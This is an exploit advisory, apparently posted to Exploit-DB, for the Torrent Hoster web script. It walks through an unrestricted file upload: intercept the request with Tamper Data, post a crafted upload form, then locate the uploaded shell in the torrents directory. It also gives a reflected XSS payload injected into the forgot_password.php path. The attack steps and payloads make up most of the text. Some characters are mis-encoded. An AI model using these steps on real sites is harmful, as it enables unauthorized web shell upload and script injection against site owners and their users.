========================================================================================
| # Title : Torrent Hoster Remont Upload Exploit
| # Author : El-Kahina
| # Home : www.h4kz.com |
| # Script : Powered by Torrent Hoster.
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : Upload
|
====================== Exploit By El-Kahina =================================
# Exploit :
1 - use tamper data :
http://127.0.0.1/torrenthoster//torrents.php?mode=upload
2-
<center>
Powered by Torrent Hoster
<br />
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
<strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br />
<br>
<input type="file" name="upfile" size="50" /><br />
<input type="submit" value="��� �����" id="upload" />
</form>
<div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
</center>
3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)
4 - Xss:
http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------